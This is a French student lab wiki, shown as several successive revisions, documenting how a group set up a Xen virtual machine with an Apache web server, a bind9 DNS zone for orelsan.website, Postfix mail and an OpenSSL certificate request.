L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
monserveur.key contient la clé privée.<br />
serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat<br />
<br />
on crée 2 fichier avec :<br />
inter.crt qui contient le certificat intermédiaire<br />
gandi.crt qui qui contient le certificat <br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35634TP sysres IMA2a5 2016/2017 G42016-12-05T16:34:55Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35633TP sysres IMA2a5 2016/2017 G42016-12-05T16:26:47Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i> Toutes les informations écrites dans ce fichier seront visible sur notre page.</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35632TP sysres IMA2a5 2016/2017 G42016-12-05T16:24:09Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35631TP sysres IMA2a5 2016/2017 G42016-12-05T16:01:34Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35630TP sysres IMA2a5 2016/2017 G42016-12-05T15:57:10Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
